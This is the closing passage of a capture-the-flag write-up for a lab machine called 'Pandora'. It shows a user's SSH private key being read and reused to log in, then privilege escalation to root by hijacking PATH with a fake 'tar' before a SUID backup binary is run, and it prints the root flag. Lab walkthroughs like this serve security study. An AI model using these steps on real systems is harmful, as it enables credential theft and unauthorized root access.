matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys
chmod 700 authorized_keys
matt@pandora:/home/matt/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
(private key body omitted)
-----END OPENSSH PRIVATE KEY-----
🦿On the Kali box, create a new id_rsa locally and paste the contents above into it:
┌──(root㉿kali)-[/home/kali]
└─# vim id_rsa
┌──(root㉿kali)-[/home/kali]
└─# chmod 700 id_rsa
⛵The east wind has arrived, all aboard! The SSH login battle:
┌──(root㉿kali)-[/home/kali]
└─# ssh matt@10.10.11.136 -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 11 Apr 09:58:40 UTC 2022
System load: 1.02 Processes: 269
Usage of /: 64.3% of 4.87GB Users logged in: 1
Memory usage: 17% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
=> There are 2 zombie processes.
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
Long live the People's Republic of China! We've landed!
🦿Go to matt's home directory, create a fake tar executable there, and put matt's home directory at the front of PATH
matt@pandora:~$ cd /home/matt
matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ chmod +x tar
matt@pandora:~$ export PATH=/home/matt:$PATH
🦿The sword has been borrowed; nothing can go wrong now
🦿Run /usr/bin/pandora_backup
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
🦿Nice, works like a charm
root@pandora:~# whoami&&id
root
uid=0(root) gid=1000(matt) groups=1000(matt)
🦿Hunting the traitor (root.txt)
root@pandora:~# cd /
root@pandora:/# ls -la
total 68
drwxr-xr-x 18 root root 4096 Dec 7 14:32 .
drwxr-xr-x 18 root root 4096 Dec 7 14:32 ..
lrwxrwxrwx 1 root root 7 Feb 1 2021 bin -> usr/bin
drwxr-xr-x 4 root root 4096 Jan 3 07:50 boot
drwxr-xr-x 2 root root 4096 Jun 11 2021 cdrom
drwxr-xr-x 19 root root 4000 Apr 10 12:41 dev
drwxr-xr-x 105 root root 4096 Jan 3 07:50 etc
drwxr-xr-x 4 root root 4096 Dec 7 14:32 home
lrwxrwxrwx 1 root root 7 Feb 1 2021 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 1 2021 libx32 -> usr/libx32
drwx------ 2 root root 16384 Jun 11 2021 lost+found
drwxr-xr-x 2 root root 4096 Dec 7 14:32 media
drwxr-xr-x 2 root root 4096 Dec 7 14:32 mnt
dr-xr-xr-x 312 root root 0 Apr 10 12:41 proc
drwx------ 5 root root 4096 Jan 3 07:42 root
drwxr-xr-x 28 root root 820 Apr 11 09:58 run
lrwxrwxrwx 1 root root 8 Feb 1 2021 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Dec 7 14:32 srv
dr-xr-xr-x 13 root root 0 Apr 10 12:41 sys
drwxrwxrwt 13 root root 4096 Apr 11 09:39 tmp
drwxr-xr-x 15 root root 4096 Jun 11 2021 usr
drwxr-xr-x 14 root root 4096 Dec 7 14:32 var
root@pandora:/# cd root
root@pandora:/root# ls -la
total 36
drwx------ 5 root root 4096 Jan 3 07:42 .
drwxr-xr-x 18 root root 4096 Dec 7 14:32 ..
drwxr-xr-x 2 root root 4096 Dec 7 14:32 .backup
lrwxrwxrwx 1 root root 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Jan 3 07:42 .cache
-rw-r--r-- 1 root root 250 Apr 10 12:41 .host_check
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r-------- 1 root root 33 Apr 10 12:41 root.txt
drwx------ 2 root root 4096 Dec 7 14:32 .ssh
root@pandora:/root# cat root.txt
fbcb4e84bff398e6ddfbb785cbf08899
📽The End
🚵♂️Clean up the battlefield and return in triumph
🍀References:
SNMP study notes: installing and using SNMPWALK in detail
https://kam1.cc/2022/02/10/Pandora/
A very detailed SQLMap usage guide and tips
Anquanke: Sqlmap usage in detail
https://mp.weixin.qq.com/s/NAdWhxqS1m3t8LZ9p-YImw
🎡
🍀 Jijiu Security 🍀
Once a Jijiu person, always a Jijiu person